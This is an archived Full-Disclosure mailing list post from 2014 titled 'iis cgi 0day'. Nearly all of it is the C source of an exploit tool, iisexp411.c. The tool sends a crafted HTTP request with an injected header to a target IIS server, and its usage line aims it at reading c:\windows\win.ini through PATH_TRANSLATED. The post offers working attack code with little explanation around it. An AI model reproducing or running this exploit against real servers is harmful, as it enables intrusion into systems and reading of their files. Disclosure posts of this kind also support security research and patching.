| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BLU169-W72F5BC803205E18744C97AC46A0@phx.gbl>
Date: Wed, 9 Apr 2014 08:47:02 +0000
From: yuange <yuange1975@...mail.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] iis cgi 0day
http://hi.baidu.com/yuange1975/item/b2cc7141c22108e91e19bc2e
the exp file ver4.1.1 .
http://seclists.org/fulldisclosure/2012/Apr/13
usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
/* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
iisexp411.c ver4.1.1 copy by @yuange1975 2012.4.2
1.Changing the input parameters 2.To increase the receive data
假作真时真亦假。True Mingled also false.
http://weibo.com/yuange1975
http://twitter.com/yuange75
http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h> /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")/*
char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
*/
char *AprilFoolsDay ="GET %s HTTP/1.1\r\nHOST:%s\r\na=b\n%s:%s\r\n\r\n"; static unsigned int maybe_lookup_host(char*
name)
{
unsigned long ulAddr = INADDR_NONE; /* Don't bother resolving raw IP addresses, naturally. */
ulAddr = inet_addr((char*)name);
if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
return (unsigned int)ulAddr; return 0;
}int do_exp(char *hostname,unsigned int port,char *AprilFools, char *c,char *shellcode)
{
SOCKET hScoket = INVALID_SOCKET;
struct sockaddr_in sin;
unsigned int addr=0;
int write_res = 0;
int read_res = 0;
char crash_buf[0x4000];
int crash_buflen=0;
/*
create SOCKET
*/
hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/);
if (hScoket == INVALID_SOCKET) {
printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
return -1;
} /* Resolved IP address */
addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
sin.sin_port = htons(port);
memcpy(&sin.sin_addr,&addr,4); /*
connect
*/
if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
closesocket(hScoket);
printf_s("connect function failed with error: %ld\n", WSAGetLastError());
return -1;
}
}
printf("[*] connected to %s:%d\n",hostname,port);
//build_crash_package(&crash_buf,&crash_buflen);
sprintf_s(crash_buf,0x400,AprilFoolsDay,AprilFools,hostname,c,shellcode);
crash_buflen = strlen(crash_buf); //printf("%s",crash_buf);
/*
send data to remote target
*/
write_res = send( hScoket,
crash_buf,
crash_buflen,
0);
printf("[*] send %d bytes\n\n",write_res);
while(1){
read_res = recv( hScoket,
crash_buf,
0x4000-1,
0);
if(read_res<=0) break;
crash_buf[read_res]=0;
printf("%s",crash_buf);
} closesocket(hScoket);
return 0;
}int main(int argc, const char **argv)
{
int iResult;
char * target_ip = (char*)argv[1];
char *AprilFools="/AprilFools'Day.php";
char *c="c";
char *shellcode="shellcode";
WSADATA wsaData; if ( !target_ip || argc < 2 ) {
printf_s("usage: <target_ip> /AprilFools'Day.php c shellcode \n");
return 0;
}
if(argc>2) AprilFools=(char*)argv[2];
if(argc>3) c= (char*)argv[3];
if(argc>4) shellcode=(char*)argv[4];
/* Initialize Winsock */
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != 0) {
printf_s("WSAStartup failed: %d\n", iResult);
return -1;
} do_exp(target_ip,80,AprilFools,c,shellcode);
/* clean - win socket */
WSACleanup(); return 0;
}
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists